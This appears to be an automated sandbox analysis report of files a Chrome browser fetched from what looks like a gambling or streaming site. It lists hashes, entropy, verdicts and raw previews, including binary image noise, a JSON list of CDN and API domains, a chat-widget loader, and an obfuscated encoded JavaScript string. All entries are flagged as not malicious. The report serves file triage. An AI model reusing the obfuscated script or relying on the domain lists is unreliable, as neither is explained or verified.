                                                                                                                                                          Preview:...........]{.#.q._.b...;.7....%d$.|..+.")~. .d..-9C..ooE...).l9..."..99.q...9.WQ.|.56.`.....~.3{{.Ow......uu...N....y........9^.&........?80..t:.c.{........]...#g|8...71......../2~.].. r.h`........V.d.z...2..-.x....t.......G..4.`...3q..a.7...;...d.2.5D.o.U#...<rQ]0...l.!...J.G.-3.;...U.2PM..,+.....i...{...X.V...a.`..............7.....]-R. ....X.;...F...3....l..3H.8U.H..*.:X\i]w.........,....O...Z+ov....@.....iB.......A.7\.nE..pg.AZ....I.`c.M_[.....p".&.....7..`/....Sg.............\...z.N..K........ r..<........;...F..g......x...<...O.>.H|..7p..}|n|..K.W;;.Bx..1p..J-.........!r.|..wh...hG.I..v......X....y.F.b...*;..........`6r.X..O.}U........u.........g..6.{.....e.F.@[F..cE..em..l.Z...z..SuK.}-.$.x..d3/.s.1...s......t.......a5r.5..S...M.j.*I...<.S.(N.c....8q..V.r.v..D0G=h.....B..Wh.0...8r*=.!'.0.$...((.Z)'..EE.,...D....KV#4Z.Bn.(..T)7....M....D..s.MS#.d@...d.6F)4jP..MYrI.I4.F-..Ft.8.i...gW1...T.T#Mb-.JSUpia.$..v.x ..........?q.B..`0....YG>.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 37 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1940
                                                                                                                                                          Entropy (8bit):7.388563089427014
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:ozNn28cVtdvJ36GTNccFAe4wMNMVh8+YrFJ69:y2bVtqGTNhK1NMVwW9
                                                                                                                                                          MD5:8508CDBD5AEDE45170E421C01377938D
                                                                                                                                                          SHA1:31FA6722AE55A6625A996B7192D839B3AC2C64D9
                                                                                                                                                          SHA-256:EE2D3E42D2BD093FC849052C816A81778DA615B0B96871788F7D1C6D5AE7DAE5
                                                                                                                                                          SHA-512:5A4C6B47D5E57DE6EDB5CEF5BA85E5EF93ACE723F1961E5705BB603F736B2F22859E49D17EDEA6FD5B24E8F53F020AA4165F6FC5DBC7871FA25FD533E10B64C5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/button/icon_member_n.png
                                                                                                                                                          Preview:.PNG........IHDR...%...%...... .....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.6 (Macintosh)" xmpMM:InstanceID="xmp.iid:C52714971EC611EE8653DFFA3047B159" xmpMM:DocumentID="xmp.did:C52714981EC611EE8653DFFA3047B159"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C52714951EC611EE8653DFFA3047B159" stRef:documentID="xmp.did:C52714961EC611EE8653DFFA3047B159"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>k..3....IDATx...k.A..:.$F....E.#.. .........$.M..A..=y...rq..*.........F....F..Mb&.t...:..T.t'....R.5_.z...J)1
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18388
                                                                                                                                                          Entropy (8bit):4.351571195978757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:sPrmmNeqmORafrtTThDeJ+GgJttHVENDYXdk0hfbwSr:0rmFORstThDeJtgJtFVENMXdkMBr
                                                                                                                                                          MD5:AB2CBE8957927CF9923F1435AA517BC8
                                                                                                                                                          SHA1:C1F5439091C7914EE2E65D8E9E4DC31A17327AEC
                                                                                                                                                          SHA-256:36BFC70E4B7D8EE7D2C3687C8F704AE2021A8F1F61FF31AD71C6227C602391D7
                                                                                                                                                          SHA-512:9A51747CC8D842CDF60CD433964529A5CBDD02E83D2972D8059B5935F7EF912757FF4461E757B5F662195F22A86B65F7969151BF9DAA303B5F55FF483C6C6266
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{. "nnn": "outer-888",. "versions": {. "zb_m": "240606-01",. "zb_pc_member": "240529-01". },. "http": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1585","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1985"]. },. "https": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1586","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1986"]. },. "public_domain": ["cppublbyv2-ali.epie3d.com", "cppublbyv2-hw.zjbxxy.com", "cppublbyv2-ty.huliancc.com"],. "gb_app_ins_domains": ["appiso-ty.souzhanzx.com:1066", "appiso-ty.zvbzjsb.com:8066"],. "gb_plist_api_domains": ["qpplist.lcyj888.com"],. "gb_wx_proxy": "https://wy-ali.meriksenrusso.com",. "gb_disabled_proxy": true,. "gb_is_pc_sp
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 191 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):51236
                                                                                                                                                          Entropy (8bit):7.988787243099008
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:oM2REopEC3OiCghnp6CzyfybbZTz0aj5I:J2WKEC3fbhpzOybR0ajq
                                                                                                                                                          MD5:E6E8285E9BABDDC3A2E1E2D1112E84AB
                                                                                                                                                          SHA1:C27369E6C49E862B4B265F0F3AA7719A7EC2C723
                                                                                                                                                          SHA-256:8C10478BBFA473866184256FDF1A26D584EE7898995638FC68030C8C05C85F85
                                                                                                                                                          SHA-512:EF8C142F8A64A14851D1372F60BF13ED14583A07CE6669CF568984085F8D58FFA1AA2D8567F73310A6366127D21F085ABD3A3DC104F3F816B24750EF423D3C38
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/245/games/mg/mg_game_04.png
                                                                                                                                                          Preview:.PNG........IHDR.......x.....,e.]....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:9E73F9157B7A11E8BFE8B32CF9776214" xmpMM:DocumentID="xmp.did:9E73F9167B7A11E8BFE8B32CF9776214"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9E73F9137B7A11E8BFE8B32CF9776214" stRef:documentID="xmp.did:9E73F9147B7A11E8BFE8B32CF9776214"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......IDATx.L.W.%.y%.f..<..{.7u...t..0....!).....=.b...G......=(d...5.h....`..h[.....x..j};oC*..u.9y2.^{}k}.7D
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 108 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4115
                                                                                                                                                          Entropy (8bit):7.81780563056407
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:/YR2PGKnkEmlG0XbvPAy3O2R8ZNSFTvmHm4pV1:AIdkEmldjAiU
                                                                                                                                                          MD5:89113783043916D09BE6A62817FF2162
                                                                                                                                                          SHA1:CA3018FDFD35337AC5601F088E0C46F498318A8D
                                                                                                                                                          SHA-256:8D2941AA8F0A4C24C130529670D9C15B5A61A85BA0AFBECC86CEB34014D25516
                                                                                                                                                          SHA-512:8F3011070D4100C0F173633B4F71651A26B04BB1E15F3790D1A88C584C081EDD85C2CA1525440B9DFFA7F8CAE564F16341A25DAD4552B1D41DB36E1C2F6F838B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...l...%......1.i....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:2CA7C577009711ECA582B3DACC470C64" xmpMM:DocumentID="xmp.did:2CA7C578009711ECA582B3DACC470C64"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2CA7C575009711ECA582B3DACC470C64" stRef:documentID="xmp.did:2CA7C576009711ECA582B3DACC470C64"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.oo.....IDATx.[[.W....!.0O^@. ...F .}9.Q..<.g....$.._..A...^....]}.........U.....m.].7............W.{nc.8f..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/ocs/cc.png?1717972860984
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 325 x 556, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):114423
                                                                                                                                                          Entropy (8bit):7.9916455761961815
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:3072:jYVA4/f7Ih0qCUMRwY75UovYUDUVF+/cHUNHEDX:jYO4/0CBZR3OiYZ+/cHUNQ
                                                                                                                                                          MD5:3BE4029A6AA704B98A3F92630FDD0103
                                                                                                                                                          SHA1:DDE5B69CEC9838E8058895BB58D653762D80130C
                                                                                                                                                          SHA-256:0E06A1B67596C4891D37915041CB10C2F499FB4D95D8B56CFB1464B38DB11684
                                                                                                                                                          SHA-512:F43720C6A9CF2CFAC54248AAE778216F96126665AED003B6E166407B6B23173246348580DE96BE48DA229CC48CD7E6F6F0D5318E48A98CDB490EAC7BB36290C6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...E...,.....eg.R.. .IDATx^.....y&.U.8y0.a.#...AB`0.(..^....d.Z.w%K^Yk.{..Y..>......l..L.D.HK. .."A.9.09w............BsI.....u...~....6..p.'.J.Z4Mk....&..L.\d.f;...1IRT.q.r.....%..]....d.U..x.S<..uv.wK3..m......-Ug.q2...IJ.."..eY9.....:Y__?.=`.c.dU..:...-x...,...#.e.-.m..UU.MLL.%I.F..=R.e..(.TU.c.#..e.-...4SPtf.*...,Me.ng6.Js...........&.qr.....vJ...1pp...{..^.43s.Xb...O.R[%I.P,.{W2.$P.l....`F.x-@.qE.9P|'..b....8...(. ^..i.%K...4.(......b..;a.j..W..1:....~A.._.$.....7h.&s.A0...a...4....8.9P.m..8....Z_.......J(...@.i;.EEQ^V5......X!]...s....H./_..7.V...eY...'.. E".<..Ev....1.O.......Y-.'.......... g.S..<..q=.SS.....u..CP.... 0.$..\....(.e.O.......SG.[._Os...............m..#N.[\.#d.s.y\a...$..:;...u.34....T1\H..t...6.x.....z"...Zp^.}C...8....FB..4M{..l..;.I.u.s....K..hk...i..H..ud,._..p.!.,..vO=..qV..u9`gA.b.-..#y....w.C.N.....{.`C....5.C.........2.A......F?x.=...C.=.........6.^.N.n..KP....hji..a._....+.4.-.A.MR.x....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):59933
                                                                                                                                                          Entropy (8bit):7.9921813215650905
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:1536:kWUCQZW2aFe4eKj613STKC4fTMs6hz9xyHzL/YwOg:PUCQzaFeGUNbAz9xWzUwOg
                                                                                                                                                          MD5:0CC8E9EAB8409CC54CC0DB1ADB3AF237
                                                                                                                                                          SHA1:76445589462136F40F6855F8AAE3601AD93F2B1C
                                                                                                                                                          SHA-256:7F75794746DA3855948694F54C9689808BA399BC735B4CA8A081F1563E1B1068
                                                                                                                                                          SHA-512:9FAFAFC5D99DFB1904274FF303FF4FBF5DF8E718B9D4F3C296DEE0589D385CBEF26B863E9C5C5B814DFF875D03407E4DBD03F1BD31902166E565B20DBC326168
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..............X......tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:BDA2CB8AE712E9118936949871B167DA" xmpMM:DocumentID="xmp.did:CC2FE949D45C11E98CF7F01324975861" xmpMM:InstanceID="xmp.iid:CC2FE948D45C11E98CF7F01324975861" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BB1CEF304FD4E911BF669294762EFFF6" stRef:documentID="xmp.did:BDA2CB8AE712E9118936949871B167DA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&...MIDATx..].x...=.][.U-K.......TC.%.%.@..%...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1128
                                                                                                                                                          Entropy (8bit):5.481804985828627
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:YvZLFLJxw8R5RWorwilchF7i+3XRH9oH5LxOCE+MIR4QRBRKrfjj:Yv1FLJxwewo9E0ZLxh141z
                                                                                                                                                          MD5:D09B10A7A007BF78EEEB09FA29C8C1AB
                                                                                                                                                          SHA1:0B61E0D1118C5E403CFABEE428A75568CA2E79CC
                                                                                                                                                          SHA-256:ED157AC83CCFD16499961A0B7046F00086E7CDE60E16AA8190220A29A25AAA96
                                                                                                                                                          SHA-512:2259613EDB7C6A3A0C3F22FDAA595C08E25DA559EF73B7A27DE35683493F26791890852703A46946ED12DB80E0FD0307AA15378D41F0B354F8E177577F2538E4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi-lc.tingmeikj.com/zb-cloud/stat.do?pv=ajax&pa=host.info&domain=yh8613.cc&terminal=1&r=3506563745
                                                                                                                                                          Preview:{"analyticsCode":" (function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', '2bacc0c831e1b000832b0c92c2a0f627');","domainType":1,"snType":1,"agentCode":"","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"uy09","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{},"httpsEnabled":0,"loginBg":"","webPath":"t3685","httpsSupport":0,"analyticsJs":null,"loginLogo":"","name":".....","onlineCustomerServiceUrl":"https://yh1.ywkf89.cc/chatlink.html","preventPageFlag":1,"currencyCode":"CNY","icon":"/fileupload/uy09/202108/202108190259527.png","snStatus":1,"webTitle":".......","isMaintain"
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1977
                                                                                                                                                          Entropy (8bit):7.248014256640445
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:dfinNuiqy8N8J3J6b45teX7oyUVWLffIQ:ANIu6b4zeXkyUELf
                                                                                                                                                          MD5:BF861ED8EA02C882107B63B4ABF2E536
                                                                                                                                                          SHA1:596C381475565D7708924FCFB9E47EFEB69FBCC3
                                                                                                                                                          SHA-256:EDEC280C48B8A62E52D6AEB17230A6A1C98F171A101013CA4CE1324BC63C9552
                                                                                                                                                          SHA-512:85475E6C590E5A76DB1C78051DDFF1AD49F299A8BA6C012A61E096D70A6777C26F745196C54FC71E7F55A2AE500C1048523DB6BFAC77632E93293EEE686BBC24
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:8E344AEE90D811EABF468BBD79C334E0" xmpMM:InstanceID="xmp.iid:8E344AED90D811EABF468BBD79C334E0" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6d813f3c-493d-9f4f-8816-a7a1b06c4e05" stRef:documentID="adobe:docid:photoshop:2c773ef6-6c86-11e8-ac1e-9eb171772df1"/> </rdf:Descri
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 230 x 129, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):59287
                                                                                                                                                          Entropy (8bit):7.98182700009852
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:tTeWsIfexhsubphYPKrVwuB5rU453R9i/IAmSZQTqtamSnwQ+Kp:3NKs0pCPKrVwu753vcfZQX/p
                                                                                                                                                          MD5:C09459AB8D5588FEC8A886278644B9E3
                                                                                                                                                          SHA1:CA80BC95F42A6EBFE333689DFEE132F06C030AC3
                                                                                                                                                          SHA-256:C9350E92C41653FF5EFA30105991C4ECA3147624EECCB0FBBB92059AA6D5649F
                                                                                                                                                          SHA-512:1A3A13F106172413962BEA91E48C963A2AA8DA75AD4959ED7A6C4765719792163C2EC40AB24AB605A925CB03804E0212F2F402A9336B97E1F517140E1B46ABCA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...............Y....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmp:CreateDate="2023-07-19T12:07:20+08:00" xmp:ModifyDate="2023-07-24T11:13:52+08:00" xmp:MetadataDate="2023-07-24T11:13:52+08:00" xmpMM:InstanceID="xmp.iid:21d5f2f5-1108-48a7-8f79-a443e70a19a4" xmpMM:DocumentID="xmp.did:148B2D4BF3A011E79ACBA17FF833D180" xmpMM:OriginalDocumentID="xmp.did:148B
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (4096), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4096
                                                                                                                                                          Entropy (8bit):5.9294058342494935
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VciTJvVN8EAp1sMFZu5OyCTHVBZO9e9NPe3uNF4k+c5SL:VccJvVN8Ess4ZN1uA9FZ4k+cIL
                                                                                                                                                          MD5:59D9B52031A94D94E9A63D6D99FD1481
                                                                                                                                                          SHA1:632A4537F3F4307C8A4F49C378FFEFD3B070E40A
                                                                                                                                                          SHA-256:7D8717A6B881BC3114C59DC0AB48941D2B95C82AE6D2F132F204AED92A6BB9B1
                                                                                                                                                          SHA-512:7D2880CC75CAB1EE4F88285C2D5866341FD1A9F8BAA0A17051269FEBEEF82AB4450B089283159FD421E08ACF6AB646879B7ABA665FC8DB30D8E11DA9E7512DB6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/qrCodeHome.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgGYBdAGgG8AhATQEkBLALgDMBXNGAF3vUxFJSlOASnIAiVkhAACJJwBO9LmIDcAeTAArEFwB0AExDN6aEAAV5KCCHmcAnpkFiA+s5BIAsin2sANiDEKADcoX1YQRgBCAAYAX2EVEPlpegBeTkwxaJgIZjFhUiRU8n0oTigWdi4eNExReRBOVnk0cgBHeQBhbxAACRQAWwixQPtrRjEoCAhAmElOQaiARljY0iHOAAtvJEZyTndOAFUAJQAZSo5uXnrG5rQxAYGxVNTgE30UYF1fFBgymq6bZyXRIVhgOTyTDRUi4YQAfjEAHoxABqd5oT7fADKAGlaAA5VFiIGcAa+MQTMSrUgwBplED6S7VG7kJLSEDpTb0JACN4fL66PGElQZMQnAaaABs+UyuhRqJQxKRKC2Nm6aGYuk0SHyujVtTYVxqmCQonZvmKsRUvl0zUtSF0HW6hn6Q1ItvtADIvZhPfJLf7bQszl91VApHUhJk1PRfAhZSSFUrkQMUGA4yBtbrhPrNiBDVVrrUUOaoMlOKkUAYjFA/JwVPRmJhOECAKynM4+v3tzupeg15h13ytrwZ/xefS6ADmjQAiicXSAW73zsICq3Nm3aB4AOLd21bvsDwxD+u6DVyKBoVswfRofpyZX0AZQWcAWggMBVavkCoxWJCviRLImim7bnupBZnMciDKkMQbroPBIJ2B5ISgKHnP2g7DqO6aZpOM6NLQajYguS4rshnbrkIujXvolj0PoqG+ra9GMcxWEnrW55jgR3hEZwACCmIceRPQruxKBMdRBRiFuLypEGZbJEUvz/MWugQJYCwwCgvjKgqnxzEMN4GIMUAmDadoBkpq5nPCh4ducjDcWeI66HxE4CbOnDiYYpqkAhqJZgccidlGoV2NYqTyW21IgL4UhiMhilBo5NmBuhmEObaVEuW5uGefh3lTr5JFkYuEnCBMUlMWlm
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1092 x 720, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):103738
                                                                                                                                                          Entropy (8bit):7.953096936376712
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:2OUm/OAsVxwc2a+N92Nvxm4YxsmhzsKnJkmlP8MoSG+cGm3rZMM8a8QjtUotUTga:2CpU7m7OEnq80d5ZCQjtB92Jq38Tzl
                                                                                                                                                          MD5:FE21BC54B27A9F17051B8B20272B84ED
                                                                                                                                                          SHA1:B8F46EFF9DB9C7DDA22E84C6068217F5E5CFC19C
                                                                                                                                                          SHA-256:92BFAD1534C35E59192341700DD98B1FA3783085842A4E56F1EF6EF7C52B15A1
                                                                                                                                                          SHA-512:FD9183A940A4115C4937786CAE5AF64C115FC70537C46B58DF7001241DD3C9A4DE2101167A8055032EA132CF8A2ED0CE79AF5A3D275F975A4CE5B1518E430CE4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
